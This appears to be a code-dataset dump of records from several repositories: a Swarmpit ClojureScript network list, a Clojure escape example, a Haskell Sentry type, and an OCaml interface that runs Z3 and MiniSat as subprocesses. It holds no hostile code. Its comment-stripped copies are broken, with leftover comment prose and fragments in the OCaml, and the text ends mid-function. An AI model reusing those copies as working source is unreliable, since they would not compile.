deriving via (Default BitwidthMismatch) instance (Mergeable BitwidthMismatch)
|
ea50f219f940d6a976fb2db2be9e8cf219163ffa2e6dd9f3b8e6c77879192fc3 | docker-in-aws/docker-in-aws | list.cljs | (ns swarmpit.component.network.list
(:require [material.component :as comp]
[material.component.label :as label]
[material.component.panel :as panel]
[material.component.list-table :as list]
[swarmpit.component.mixin :as mixin]
[swarmpit.component.state :as state]
[swarmpit.ajax :as ajax]
[swarmpit.routes :as routes]
[rum.core :as rum]))
(enable-console-print!)
;; Column headers for the networks table; five equal-width columns, the
;; last (unnamed) one holds the "internal" label rendered by render-item.
(def headers [{:name  "Name"
               :width "20%"}
              {:name  "Driver"
               :width "20%"}
              {:name  "Subnet"
               :width "20%"}
              {:name  "Gateway"
               :width "20%"}
              {:name  ""
               :width "20%"}])
;; Key paths into a network map, one per table column, in column order.
(def render-item-keys
  [[:networkName] [:driver] [:ipam :subnet] [:ipam :gateway] [:internal]])
(defn- render-item
  "Render a single table cell. `item` is a map-entry of [column-key value];
   the :internal flag renders as a blue label when truthy (nil otherwise),
   every other column renders its raw value."
  [item _]
  (let [value (val item)]
    (case (key item)
      ;; one-armed `if` replaced with the idiomatic `when`
      :internal (when value
                  (label/blue "internal"))
      value)))
(defn- onclick-handler
  "Frontend URL of the detail page for the network in `item`."
  [item]
  (let [network-name (:networkName item)]
    (routes/path-for-frontend :network-info {:id network-name})))
(defn- networks-handler
  "Fetch the network list from the backend; toggles the :loading? flag in
   form state while the request is in flight and stores the response under
   :items in the form value cursor."
  []
  (ajax/get
    (routes/path-for-backend :networks)
    {:state      [:loading?]
     :on-success (fn [{:keys [response]}]
                   (state/update-value [:items] response state/form-value-cursor))}))
(defn- init-form-state
  "Reset form state: not loading, empty filter query."
  []
  (state/set-value {:loading? false
                    :filter   {:query ""}} state/form-state-cursor))
;; Rum mixin run once when the form mounts: reset state, then kick off the
;; networks fetch.
(def mixin-init-form
  (mixin/init-form
    (fn [_]
      (init-form-state)
      (networks-handler))))
;; Networks list page: a filter text field, a "New network" button, and the
;; table of networks sorted by name. Reactive on both the form value cursor
;; (:items) and the form state cursor (:loading?, :filter).
(rum/defc form < rum/reactive
                 mixin-init-form
                 mixin/subscribe-form
                 mixin/focus-filter [_]
  (let [{:keys [items]} (state/react state/form-value-cursor)
        {:keys [loading? filter]} (state/react state/form-state-cursor)
        ;; client-side filtering on the current query string
        filtered-items (list/filter items (:query filter))]
    [:div
     [:div.form-panel
      [:div.form-panel-left
       (panel/text-field
         {:id       "filter"
          :hintText "Search networks"
          :onChange (fn [_ v]
                      (state/update-value [:filter :query] v state/form-state-cursor))})]
      [:div.form-panel-right
       (comp/mui
         (comp/raised-button
           {:href    (routes/path-for-frontend :network-create)
            :label   "New network"
            :primary true}))]]
     (list/table headers
                 (sort-by :networkName filtered-items)
                 loading?
                 render-item
                 render-item-keys
                 onclick-handler)]))
(:require [material.component :as comp]
[material.component.label :as label]
[material.component.panel :as panel]
[material.component.list-table :as list]
[swarmpit.component.mixin :as mixin]
[swarmpit.component.state :as state]
[swarmpit.ajax :as ajax]
[swarmpit.routes :as routes]
[rum.core :as rum]))
(enable-console-print!)
(def headers [{:name "Name"
:width "20%"}
{:name "Driver"
:width "20%"}
{:name "Subnet"
:width "20%"}
{:name "Gateway"
:width "20%"}
{:name ""
:width "20%"}])
(def render-item-keys
[[:networkName] [:driver] [:ipam :subnet] [:ipam :gateway] [:internal]])
(defn- render-item
  "Render a single table cell. `item` is a map-entry of [column-key value];
   the :internal flag renders as a blue label when truthy (nil otherwise),
   every other column renders its raw value."
  [item _]
  (let [value (val item)]
    (case (key item)
      ;; one-armed `if` replaced with the idiomatic `when`
      :internal (when value
                  (label/blue "internal"))
      value)))
(defn- onclick-handler
[item]
(routes/path-for-frontend :network-info {:id (:networkName item)}))
(defn- networks-handler
[]
(ajax/get
(routes/path-for-backend :networks)
{:state [:loading?]
:on-success (fn [{:keys [response]}]
(state/update-value [:items] response state/form-value-cursor))}))
(defn- init-form-state
[]
(state/set-value {:loading? false
:filter {:query ""}} state/form-state-cursor))
(def mixin-init-form
(mixin/init-form
(fn [_]
(init-form-state)
(networks-handler))))
(rum/defc form < rum/reactive
mixin-init-form
mixin/subscribe-form
mixin/focus-filter [_]
(let [{:keys [items]} (state/react state/form-value-cursor)
{:keys [loading? filter]} (state/react state/form-state-cursor)
filtered-items (list/filter items (:query filter))]
[:div
[:div.form-panel
[:div.form-panel-left
(panel/text-field
{:id "filter"
:hintText "Search networks"
:onChange (fn [_ v]
(state/update-value [:filter :query] v state/form-state-cursor))})]
[:div.form-panel-right
(comp/mui
(comp/raised-button
{:href (routes/path-for-frontend :network-create)
:label "New network"
:primary true}))]]
(list/table headers
(sort-by :networkName filtered-items)
loading?
render-item
render-item-keys
onclick-handler)])) | |
b40ef31b5d2179647dded05ad4b48edbc93640672eea666b1fb4a5fd9ea1024a | reborg/clojure-essential-reference | 3.clj | < 1 >
{ \newline " \\n "
\tab " \\t "
\return " \\r "
;; \" "\\\""
;; \\ "\\\\"
;; \formfeed "\\f"
\backspace " \\b " }
< 2 >
(println s)
;; Type backslash-t ' ' followed by backslash-n '
;; '
(println (s/escape s char-escape-string)) ; <3>
;; Type backslash-t '\t' followed by backslash-n '\n' | null | https://raw.githubusercontent.com/reborg/clojure-essential-reference/c37fa19d45dd52b2995a191e3e96f0ebdc3f6d69/OtherFunctions/StringsandRegularExpressions/escape%2Cchar-name-string%2Cchar-escape-string/3.clj | clojure | \" "\\\""
\\ "\\\\"
\formfeed "\\f"
Type backslash-t ' ' followed by backslash-n '
'
<3>
Type backslash-t '\t' followed by backslash-n '\n' | < 1 >
{ \newline " \\n "
\tab " \\t "
\return " \\r "
\backspace " \\b " }
< 2 >
(println s)
|
f896bc60448961b5190f53c6db8a5e27f6fe042fd08b42a74ea28bb9039cfc68 | tfausak/patrol | RuntimeContext.hs | module Patrol.Type.RuntimeContext where
import qualified Data.Aeson as Aeson
import qualified Data.Text as Text
import qualified Patrol.Extra.Aeson as Aeson
-- | <-payloads/types/#runtimecontext>
-- Runtime description payload. Field names map to JSON keys via the
-- ToJSON instance below; note 'rawDescription' serializes as
-- "raw_description".
data RuntimeContext = RuntimeContext
  { build :: Text.Text, -- ^ build identifier; JSON key "build"
    name :: Text.Text, -- ^ runtime name; JSON key "name"
    rawDescription :: Text.Text, -- ^ unparsed description; JSON key "raw_description"
    version :: Text.Text -- ^ runtime version; JSON key "version"
  }
  deriving (Eq, Show)
-- Serialize every field under its snake_case JSON key.
instance Aeson.ToJSON RuntimeContext where
  toJSON context =
    Aeson.intoObject
      [ Aeson.pair "build" (build context),
        Aeson.pair "name" (name context),
        Aeson.pair "raw_description" (rawDescription context),
        Aeson.pair "version" (version context)
      ]
-- | A 'RuntimeContext' with every field blank.
empty :: RuntimeContext
empty =
  RuntimeContext
    { build = blank,
      name = blank,
      rawDescription = blank,
      version = blank
    }
  where
    blank = Text.empty
| null | https://raw.githubusercontent.com/tfausak/patrol/1cae55b3840b328cda7de85ea424333fcab434cb/source/library/Patrol/Type/RuntimeContext.hs | haskell | | <-payloads/types/#runtimecontext> | module Patrol.Type.RuntimeContext where
import qualified Data.Aeson as Aeson
import qualified Data.Text as Text
import qualified Patrol.Extra.Aeson as Aeson
-- | Runtime description payload. Field names map to JSON keys via the
-- ToJSON instance below; note 'rawDescription' serializes as
-- "raw_description".
data RuntimeContext = RuntimeContext
  { build :: Text.Text, -- ^ build identifier; JSON key "build"
    name :: Text.Text, -- ^ runtime name; JSON key "name"
    rawDescription :: Text.Text, -- ^ unparsed description; JSON key "raw_description"
    version :: Text.Text -- ^ runtime version; JSON key "version"
  }
  deriving (Eq, Show)
instance Aeson.ToJSON RuntimeContext where
toJSON runtimeContext =
Aeson.intoObject
[ Aeson.pair "build" $ build runtimeContext,
Aeson.pair "name" $ name runtimeContext,
Aeson.pair "raw_description" $ rawDescription runtimeContext,
Aeson.pair "version" $ version runtimeContext
]
empty :: RuntimeContext
empty =
RuntimeContext
{ build = Text.empty,
name = Text.empty,
rawDescription = Text.empty,
version = Text.empty
}
|
d9ada2e0b839b51eb9b5ea79b5ea749acd2f4ab7cb190c0693e2fac9b5953151 | hipsleek/hipsleek | shares_z3_lib.ml | #include "xdebug.cppo"
open Share_prover
module PrvComms =
struct
type proc = {name:string; pid: int; inchannel: in_channel; outchannel: out_channel; errchannel: in_channel }
exception Timeout
external set_close_on_exec : Unix.file_descr -> unit = "unix_set_close_on_exec";;
let try_set_close_on_exec fd =
try set_close_on_exec fd; true with Invalid_argument _ -> false
let open_proc_full cmd args input output error toclose =
let cloexec = List.for_all try_set_close_on_exec toclose in
match Unix.fork() with
0 -> Unix.dup2 input Unix.stdin; Unix.close input;
Unix.dup2 output Unix.stdout; Unix.close output;
Unix.dup2 error Unix.stderr; Unix.close error;
if not cloexec then List.iter Unix.close toclose;
begin try Unix.execvp cmd args
with _ -> exit 127
end
| id -> id
let open_process_full cmd args =
let (in_read, in_write) = Unix.pipe() in
let (out_read, out_write) = Unix.pipe() in
let (err_read, err_write) = Unix.pipe() in
let inchan = Unix.in_channel_of_descr in_read in
let outchan = Unix.out_channel_of_descr out_write in
let errchan = Unix.in_channel_of_descr err_read in
let id = open_proc_full cmd args out_read in_write err_write [in_read; out_write; err_read] in
Unix.close out_read;
Unix.close in_write;
Unix.close err_write;
(inchan, outchan, errchan, id)
let open_proc cmd args out_file:int =
match Unix.fork() with
| 0 -> begin
let output = Unix.openfile out_file [Unix.O_CREAT;Unix.O_WRONLY] 0o640 in
Unix.dup2 output Unix.stdout; Unix.close output;
try Unix.execvp cmd args with _ -> exit 127 end
| id -> id
let sigalrm_handler = Sys.Signal_handle (fun _ -> raise Timeout)
let set_timer tsecs = ignore (Unix.setitimer Unix.ITIMER_REAL { Unix.it_interval = 0.0; Unix.it_value = tsecs })
(* same as maybe_raise_timoeut just that it treats the timeout exception with the with_timeout function *)
(* Run [fnc arg] under a wall-clock alarm of [tsec] seconds.
   On timeout the [with_timeout] fallback supplies the result; any other
   exception is logged and re-raised.
   Fix: the original cancelled the timer and restored the previous SIGALRM
   handler only on the success path, so a pending alarm (and the Timeout
   handler) survived into the caller whenever [fnc] raised. Cleanup is now
   performed on every exit path. *)
let maybe_raise_and_catch_timeout (fnc: 'a -> 'b) (arg: 'a) (tsec: float) (with_timeout: unit -> 'b): 'b =
  (* install the handler before the [try] so all branches can restore it *)
  let old_handler = Sys.signal Sys.sigalrm sigalrm_handler in
  let cleanup () =
    set_timer 0.0;
    Sys.set_signal Sys.sigalrm old_handler in
  try
    let () = set_timer tsec in
    let answ = fnc arg in
    cleanup ();
    answ
  with
  | Timeout ->
    cleanup ();
    Printf.eprintf " maybe_raise_and_catch_timeout : UNEXPECTED Timeout after %s secs" (string_of_float tsec);
    (with_timeout ())
  | exc ->
    cleanup ();
    Printf.eprintf " maybe_raise_and_catch_timeout : Unexpected exception : %s" (Printexc.to_string exc);
    raise exc
(* closes the pipes of the named process *)
(* Close all three pipes of [process], flushing its stdin first.
   Errors are deliberately swallowed: the process may already be dead.
   The out/err pair and the input channel are closed in separate [try]
   blocks so a failure on one does not skip the other. *)
let close_pipes (process: proc) : unit =
  (try
     flush process.outchannel;
     Unix.close (Unix.descr_of_out_channel process.outchannel);
     Unix.close (Unix.descr_of_in_channel process.errchannel)
   with | e -> () );
  (try
     Unix.close (Unix.descr_of_in_channel process.inchannel)
   with | e -> () )
let start (prover: string * string * string array) set_process =
let (prover_name, prover_proc, prover_arg_array) = prover in
try
let inchn, outchn, errchn, npid = open_process_full prover_proc prover_arg_array in
let process = {name = prover_name; pid = npid; inchannel = inchn; outchannel = outchn; errchannel = errchn} in
set_process process
with
| e -> begin
let () = print_string ("\n["^prover_name^".ml ]Unexpected exception while starting prover "^ prover_name ^ "\n") in
flush stdout; flush stderr;
raise e
end
let stop (process:proc) (invocations: int) (killing_signal: int) =
close_pipes process;
try
Unix.kill process.pid killing_signal;
ignore (Unix.waitpid [] process.pid)
with
| e -> ()
let restart start stop = stop (); start ()
(* to delete *)
module Ss_Z3 : SAT_SLV = functor ( Sv : SV ) - >
(* struct *)
type t_var = Sv.t
(* type nz_cons = t_var list list *)
type p_var = ( \*include Gen. EQ_TYPE with type t = v*\ )
| PVar of t_var
(* | C_top *)
(* type eq_syst = (t_var*t_var*p_var) list *)
(* let stringofTvar = Sv.string_of *)
let stringofPvar v = match v with | C_top - > " T " | PVar v - > Sv.string_of v
(* let mkTop () = C_top *)
let mkVar v = PVar v
let v = match v with | C_top - > None | PVar v - > Some v
let string_of_eq ( v1,v2,v3 ) = ( Sv.string_of v1)^ " * " ^(Sv.string_of v2)^ " = " ^(match v3 with | PVar v3 - > Sv.string_of v3 | _ - > " true " )
let string_of_eq_l l = String.concat " \n " ( List.map string_of_eq l )
(* (\**********Z3 interface **********\) *)
(* (\** Create a boolean variable using the given name. *\) *)
let mk_bool_var ctx name = Z3.mk_const ctx ( ctx name ) ( Z3.mk_bool_sort ctx )
(* let mk_sv_bool_var ctx sv = mk_bool_var ctx (Sv.get_name sv) *)
(* (\** Create a logical context. Enable model construction. Also enable tracing to stderr. *\) *)
(* let mk_context ()= *)
(* let cfg = Z3.mk_config () in *)
Z3.set_param_value cfg " MODEL " " false " ;
let ctx = in
(* Z3.trace_to_stderr ctx; *)
(* ctx *)
( \ * * Check if ctx is sat . if sat , then could get the )
(* let check ctx =(match Z3.check ctx with *)
(* | Z3.L_FALSE -> false *)
| Z3.L_UNDEF - > print_string " unknown\n " ; failwith " unknown sat "
(* | Z3.L_TRUE -> true ) *)
(* let add_eqs ctx = *)
(* List.iter (fun (v1,v2,v3)-> *)
(* let bv1 = mk_sv_bool_var ctx v1 in *)
let bv2 = mk_sv_bool_var ctx v2 in
let xor12 = Z3.mk_xor ctx bv1 bv2 in
(* match v3 with *)
| PVar v3- >
( Z3.assert_cnstr ctx ( Z3.mk_not ctx ( Z3.mk_and ctx [ |bv1;bv2| ] ) ) ;
ctx ( Z3.mk_eq ctx xor12 ( mk_sv_bool_var ctx v3 ) ) )
(* | C_top -> Z3.assert_cnstr ctx xor12 *)
(* ) *)
let add_one_nz ctx l= Z3.assert_cnstr ctx ( Z3.mk_or ctx ( Array.of_list ( List.map ( mk_sv_bool_var ctx ) l ) ) )
(* let add_nz ctx = List.iter (add_one_nz ctx) *)
(* let check_sat_nz ctx non_zeros = *)
(* Z3.push ctx; *)
add_nz ;
if check ctx then ( Z3.pop ctx 1;true )
(* else *)
( Z3.pop ctx 1 ;
(* List.for_all (fun l -> *)
(* Z3.push ctx; *)
(* add_one_nz ctx l; *)
(* let r= check ctx in *)
(* Z3.pop ctx 1; *)
(* r) non_zeros ) *)
let call_sat non_zeros eqs =
(* let ctx = mk_context () in *)
add_eqs ctx eqs ;
(* let r = check_sat_nz ctx non_zeros in *)
Z3.del_context ; r
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
print_string ( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
(* print_string ("r: "^(string_of_bool r)^"\n"); r *)
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
(* let ctx = mk_context () in *)
(* add_eqs ctx a_l_eqs; *)
(* print_string "added eqs\n";flush_all (); *)
(* if not (check_sat_nz ctx a_nz_cons) then (Z3.del_context ctx;true) *)
(* else *)
let = Hashtbl.create 20 in
let bool_sort = Z3.mk_bool_sort ctx in
let ( ) = List.fold_left ( fun c v- > Hashtbl.add tbl ( Sv.get_name v ) ( Z3.mk_bound ctx c bool_sort ) ; c+1 ) 1 c_ev in
(* print_string "added exists\n";flush_all (); *)
let v =
let in
(* try *)
(* Hashtbl.find tbl nm *)
(* with Not_found -> mk_bool_var ctx nm in *)
(* let conseq = *)
let f_ccv = List.fold_left ( fun a ( v , c)- >
(* let z3v = mk_sv_bool_var_ex v in *)
let z3v = if c then z3v else Z3.mk_not ctx z3v in
(* Z3.mk_and ctx [| a ; z3v|] *)
(* ) (Z3.mk_true ctx) c_const_vars in *)
(* let f_sv = List.fold_left (fun a (v1,v2)-> *)
(* let z3v1 = mk_sv_bool_var_ex v1 in *)
let z3v2 = in
(* let z3eq = Z3.mk_eq ctx z3v1 z3v2 in *)
Z3.mk_and ctx [ |a ; z3eq| ]
(* ) f_ccv c_subst_vars in *)
(* let f_nz = List.fold_left (fun a l -> *)
let nz_arr = Array.of_list ( List.map mk_sv_bool_var_ex l ) in
(* Z3.mk_and ctx [|a;Z3.mk_or ctx nz_arr|] *)
(* ) f_sv c_nz_cons in *)
(* let f_eqs = List.fold_left (fun a (v1,v2,v3)-> *)
(* let z3v1 = mk_sv_bool_var_ex v1 in *)
let z3v2 = in
let xor12 = Z3.mk_xor ctx z3v1 z3v2 in
(* let f1 = Z3.mk_not ctx (Z3.mk_and ctx [|z3v1;z3v2|]) in *)
(* let a = Z3.mk_and ctx [|a;f1|] in *)
(* match v3 with *)
| PVar v3 - > Z3.mk_and ctx [ | a ; Z3.mk_eq ctx xor12 ( mk_sv_bool_var_ex v3 ) | ]
(* | C_top -> Z3.mk_and ctx [| a; xor12 |] *)
(* ) f_nz c_l_eqs in *)
let l = c_ev in
(* let types = Array.init l (fun _ -> bool_sort) in *)
(* let names = Array.init l (Z3.mk_int_symbol ctx) in *)
(* Z3.mk_forall ctx 0 [||] types names f_eqs in *)
(* print_string "constructed conseq\n";flush_all (); *)
Z3.assert_cnstr ctx ( Z3.mk_not ) ;
(* print_string "added conseq\n";flush_all (); *)
(* let r = Z3.check ctx in *)
(* print_string "actuall check\n";flush_all (); *)
(* Z3.del_context ctx; *)
(* match r with *)
(* | Z3.L_FALSE -> true *)
(* | Z3.L_UNDEF -> print_string "unknown\n"; false *)
(* | Z3.L_TRUE -> false *)
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
(* let nzs = *)
(* String.concat "," ( *)
List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) a_nz_cons ) in
let eqss = string_of_eq_l a_l_eqs in
print_string ( " \n Imply : " ^nzs^"\n"^eqss^"\n");flush_all ( ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
(* print_string ("r: "^(string_of_bool r)); r *)
(* end;; *)
(* to delete *)
(************************************************************************************)
module Ss_Z3_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
(**********Z3 interface **********)
(**********Z3 interface **********)
(**********Z3 interface **********)
(**********Z3 interface **********)
let smt_of_acons (v,c) = if c then Sv.string_of v else "(not " ^(Sv.string_of v) ^" )"
let smt_of_asub (v1,v2) = "(= " ^(Sv.string_of v1) ^ " " ^ (Sv.string_of v2) ^ ")"
let smt_of_eq (v1,v2,v3) =
" (= " ^ " ( and " ^(Sv.string_of v1)^ " " ^ ( Sv.string_of v2)^ " ) " ^ " " ^ ( match v3 with PVar v- > Sv.string_of v | _ - > " 1 " ) ^ " ) "
let xor12 = "(xor " ^(Sv.string_of v1)^ " " ^ (Sv.string_of v2)^")" in
match v3 with
| PVar v3->
let eq = "(= " ^ xor12 ^ " " ^ (Sv.string_of v3) ^ ")" in
let neq = "(not (and " ^ (Sv.string_of v1)^ " " ^ (Sv.string_of v2) ^ " ) )" in
"(and " ^ eq^ " " ^ neq ^ " )"
| C_top -> xor12
let smt_of_anz nz = match nz with
| [] -> failwith "error, unexpected empty nz"
| h::t -> List.fold_left (fun a c-> "(or " ^ a ^ " " ^ (Sv.string_of c) ^ ")") (Sv.string_of h) t
let smt_of_ante (_,anz,asub,acons,aeq) =
let acons = List.map (fun c-> "(assert " ^ (smt_of_acons c) ^ ")\n") acons in
let asub = List.map (fun c-> "(assert " ^ (smt_of_asub c) ^ ")\n") asub in
let aeq = List.map (fun c-> "(assert " ^ (smt_of_eq c) ^ ")\n") aeq in
let anz = List.map (fun c-> "(assert " ^ (smt_of_anz c) ^ ")\n") anz in
String.concat "" (acons@asub@aeq@anz)
let smt_of_conseq (cex,cnz,csub,ccons,ceq) =
let ccons = List.map smt_of_acons ccons in
let csub = List.map smt_of_asub csub in
let ceq = List.map smt_of_eq ceq in
let cnz = List.map smt_of_anz cnz in
let s = List.fold_left (fun a c-> "(and " ^ a ^ " " ^ c ^ ")") "true" (ccons@csub@ceq@cnz) in
List.fold_left (fun a c -> "(exists ((" ^ (Sv.string_of c) ^ " Bool)) " ^ a ^ ")") s cex
(***************************************************************
INTERATION
**************************************************************)
type sat_type =
| Sat (* solver returns sat *)
| UnSat (* solver returns unsat *)
| Unknown (* solver returns unknown or there is an exception *)
| Aborted (* solver returns an exception *)
Collect all Z3 's output into a list of strings
(* Read Z3's replies line by line, accumulating them until a short status
   line is seen ("sat"/"unsat"/"unknown" are all <= 7 chars) or EOF.
   NOTE(review): a line longer than 7 characters is treated as noise and
   triggers another read, which can block indefinitely if Z3 keeps
   producing long output — the inline comment below acknowledges this. *)
let rec icollect_output chn accumulated_output : string list =
  let output = try
      let line = input_line chn in
      if ((String.length line) > 7) then (* something other than sat/unsat/unknown: retry (may lead to timeout here) *)
        icollect_output chn (accumulated_output @ [line])
      else accumulated_output @ [line]
    with
    | End_of_file -> accumulated_output in
  output
(* Classify a Z3 status line [r]. "sat"/"unsat" map directly; a reply
   containing "unexpected" means our SMT translation was rejected, so we
   fail hard (including the offending [input] in the message); anything
   else is reported as [Unknown]. *)
let sat_type_from_string r input=
  if (r = "sat") then Sat
  else if (r = "unsat") then UnSat
  else
    try
      (* Str.search_forward raises Not_found when "unexpected" is absent *)
      let (todo_unk:int) = Str.search_forward (Str.regexp "unexpected") r 0 in
      (print_string "Z3 translation failure!"; failwith ("Z3 translation failure!!\n"^r^"\n input: "^input))
    with
    | Not_found -> Unknown
let iget_answer chn input=
let output = icollect_output chn [] in
sat_type_from_string (List.nth output (List.length output - 1)) input
let remove_file filename = try Sys.remove filename with | e -> ()
(* Global settings *)
let prover_process = ref {
PrvComms.name = "z3";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let smtsolver_name = ref ("z3": string)
let z3_call_count: int ref = ref 0
let is_z3_running = ref false
(***********)
let test_number = ref 0
let last_test_number = ref 0
let z3_restart_interval = ref (-1)
let path_to_z3 = "z3" (*"z3"*)
let smtsolver_name = ref ("z3": string)
(* start z3 system in a separated process and load redlog package *)
and start() =
if not !is_z3_running then begin
print_string "Starting z3... \n"; flush stdout;
last_test_number := !test_number;
PrvComms.start (!smtsolver_name, !smtsolver_name, [|!smtsolver_name;"-smt2"; "-si"|]) (fun proc -> prover_process := proc);
is_z3_running := true;
end
stop Z3 system
let stop () =
if !is_z3_running then begin
let num_tasks = !test_number - !last_test_number in
print_string ("Stop z3... "^(string_of_int !z3_call_count)^" invocations "); flush stdout;
let () = PrvComms.stop !prover_process num_tasks Sys.sigkill in
is_z3_running := false;
end
restart Z3 system
let restart reason =
if !is_z3_running then
let () = print_string (reason^" Restarting z3 after ... "^(string_of_int !z3_call_count)^" invocations ") in
PrvComms.restart start stop
else print_string (reason^" not restarting z3 ... "^(string_of_int !z3_call_count)^" invocations ")
(* send formula to z3 and receive result -true/false/unknown*)
(* Send SMT-LIB script [f] to the persistent Z3 process inside a
   (push)/(pop) scope and read back the verdict. Lazily starts Z3 on first
   use and restarts it every [z3_restart_interval] calls (when that
   interval is non-negative). On timeout Z3 is restarted and [Unknown] is
   returned. *)
let check_formula f timeout =
  begin
    if not !is_z3_running then start ()
    else if (!z3_call_count = !z3_restart_interval) then
      begin
        restart("Regularly restart:1 ");
        z3_call_count := 0;
      end;
    let fnc f =
      incr z3_call_count;
      (* scope the query so state does not leak between calls *)
      output_string (!prover_process.PrvComms.outchannel) ("(push)\n" ^ f ^ "(pop)\n");
      flush (!prover_process.PrvComms.outchannel);
      iget_answer (!prover_process.PrvComms.inchannel) f
    in
    let fail_with_timeout () = restart ("[z3.ml]Timeout when checking sat!" ^ (string_of_float timeout)); Unknown in
    PrvComms.maybe_raise_and_catch_timeout fnc f timeout fail_with_timeout
  end
let rec rem_dups l = match l with [] -> [] | q::qs -> if (List.exists (Sv.eq q) qs) then rem_dups qs else q::(rem_dups qs)
let fv (exv,nz,subs,cons,eqs)=
let w1,w2 = List.split subs in
let fv_eq (v1,v2,v3)= v1::v2::(match v3 with C_top -> [] | PVar v-> [v]) in
exv@(List.concat nz)@(fst (List.split cons))@w1@w2@(List.concat (List.map fv_eq eqs))
let to_smt ante conseq : string =
let conseq1 = match conseq with
| None -> ([],[],[],[],[])
| Some f -> f in
let all_fv = rem_dups (fv ante @ fv conseq1) in
let smt_var_decls = String.concat "" (List.map (fun v -> "(declare-fun " ^ (Sv.string_of v) ^ " () Bool)\n" ) all_fv) in
let ante_str = smt_of_ante ante in
let conseq_str = if conseq=None then "false" else smt_of_conseq conseq1 in
( ";Variables declarations\n" ^smt_var_decls ^ ";Antecedent\n" ^ ante_str ^ ";Negation of Consequence\n" ^ "(assert (not " ^ conseq_str ^ "))\n" ^ "(check-sat)")
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst)
(c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let input = to_smt (a_ev, a_nz_cons, [],[],a_l_eqs) (Some (c_ev, c_nz_cons, c_subst_vars, c_const_vars, c_l_eqs)) in
( " \n \n z3 input : " ^(input)^"\n " ) ;
match check_formula input 0. with
| Sat -> false
| UnSat -> true
| Unknown -> false
| Aborted -> false
let call_sat non_zeros eqs =
match (check_formula (to_smt ([],non_zeros,[],[],eqs) None)) 10.0 with
| UnSat -> false
| _ -> true
let call_sat non_zeros eqs =
let nzs = String.concat "," (List.map (fun l-> "{"^(String.concat "," (List.map Sv.string_of l))^"}") non_zeros) in
let eqss = string_of_eq_l eqs in
( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
(************************************************************************************)
module Ss_minisat_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
(**********minisat interface **********)
(* Global settings *)
let minisat_timeout_limit = 15.0
let test_number = ref 0
let last_test_number = ref 0
let minisat_restart_interval = ref (-1)
let log_all_flag = ref false
let is_minisat_running = ref false
default timeout is 15 seconds
let minisat_call_count: int ref = ref 0
let log_file = open_out ("allinput.minisat")
valid value is : " file " or " stdin "
(*minisat*)
let minisat_path = "/usr/local/bin/minisat"
let minisat_name = "minisat"
let minisat_arg = "-pre"
let minisat_input_format = "cnf" (* valid value is: cnf *)
let number_clauses = ref 1
let number_var = ref 0
let minisat_process = ref { PrvComms.name = "minisat";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
(***************************************************************
INTERACTION
**************************************************************)
let rec collect_output (chn: in_channel) : (string * bool) =
try
let line = input_line chn in
if line = "SATISFIABLE" then
(line, true)
else
collect_output chn
with
| End_of_file -> ("", false)
(* True iff the minisat output line reports satisfiability.
   Fix: the original spelled this as [if c then true else false] through an
   intermediate binding; collapsed to the bare comparison. *)
let get_prover_result (output : string) :bool =
  output = "SATISFIABLE"
(* output: - prover_output - the running status of prover: true if running, otherwise false *)
let get_answer (chn: in_channel) : (bool * bool)=
let (output, running_state) = collect_output chn in
let
validity_result = get_prover_result output;
in
(validity_result, running_state)
(* Best-effort delete: a missing or locked file is silently ignored. *)
let remove_file filename =
  try Sys.remove filename with _ -> ()
let set_process proc =
minisat_process := proc
let start () =
if not !is_minisat_running then (
print_endline_quiet ("Starting Minisat... \n");
last_test_number := !test_number;
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg|]) set_process;
is_minisat_running := true;
)
)
(* stop minisat system *)
let stop () =
if !is_minisat_running then (
let num_tasks = !test_number - !last_test_number in
print_string ("\nStop Minisat... " ^ (string_of_int !minisat_call_count) ^ " invocations "); flush stdout;
let () = PrvComms.stop !minisat_process num_tasks Sys.sigkill in
is_minisat_running := false;
)
restart Omega system
let restart reason =
if !is_minisat_running then (
let () = print_string (reason ^ " Restarting minisat after ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in
PrvComms.restart start stop
)
else (
